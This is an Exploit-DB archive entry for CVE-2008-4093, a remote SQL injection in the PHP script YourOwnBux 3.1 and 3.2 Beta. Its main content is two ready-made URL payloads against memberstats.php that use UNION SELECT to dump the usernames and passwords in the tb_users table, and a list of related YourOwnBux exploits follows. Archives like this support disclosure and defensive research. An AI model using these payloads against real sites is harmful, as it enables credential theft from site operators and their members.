| EDB-ID: 6321 | Author: ~!Dok_tOR!~ | Published: 2008-08-27 | |
| CVE: CVE-2008-4093 | Type: Webapps | Platform: PHP | |
E-DB Verified:
|
Exploit:
 Download
/
View Raw
|
Vulnerable App: N/A | |
YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability Author: ~!Dok_tOR!~ Date found: 28.08.08 Product: YourOwnBux Version: 3.1, 3.2 Price: $39.99 DEMO: yourownbux.com/demos/ Vulnerability Class: SQL Injection Condition: magic_quotes_gpc = Off 3.2 Beta version Exploit: http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/* 3.1 version Exploit: http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/* # milw0rm.com [2008-08-27]
Related Exploits
Trying to match CVEs (1): CVE-2008-4093Trying to match OSVDBs (1): 48164
Other Possible E-DB Search Terms: Yourownbux 3.1/3.2 Beta, Yourownbux 3.1, Yourownbux
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2008-09-11 |
|
Yourownbux 4.0 - 'cookie' Authentication Bypass | Tec-n0x | |
| 2008-10-07 |
|
Yourownbux 4.0 - 'cookie' SQL Injection | Tec-n0x |